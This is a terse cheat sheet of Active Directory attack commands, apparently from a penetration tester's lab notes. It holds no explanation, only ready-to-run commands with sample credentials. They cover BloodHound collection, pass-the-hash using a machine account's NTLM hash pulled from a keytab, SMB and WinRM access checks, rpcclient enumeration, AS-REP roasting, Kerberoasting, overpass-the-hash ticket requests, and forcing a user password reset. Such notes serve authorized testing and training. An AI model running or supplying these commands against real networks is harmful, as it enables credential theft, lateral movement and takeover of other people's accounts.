Domain Reconnaissance on Kali
BloodHound
proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp
or
proxychains bloodhound-python -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp
(authenticating as the machine account; extract its NTLM hash from /etc/krb5cc.keytab)
SMB Access
smbmap -H 10.9.20.10 -u kevin -p Passw0rd
WinRM Access
crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'
SMB Signing
crackmapexec smb 10.9.20.10
User
RPCClient
proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10
enumdomusers
queryuser 0x3601
Impacket
proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator
Group
RPCClient
enumdomgroups
querygroup 0x200
AS-REP Roasting
python3 impacket/examples/GetNPUsers.py red.com/ -no-pass -dc-ip 10.9.20.10 -usersfile users.txt -format hashcat
Kerberoasting
python3 impacket/examples/GetUserSPNs.py red.com/kevin:Passw0rd -dc-ip 10.9.20.10 -request
Overpass the Hash/PTK
python3 impacket/examples/getTGT.py red.com/kevin:Passw0rd
Reset AD Password
RPCClient
setuserinfo2 lawrencecohen 23 'Passw0rd'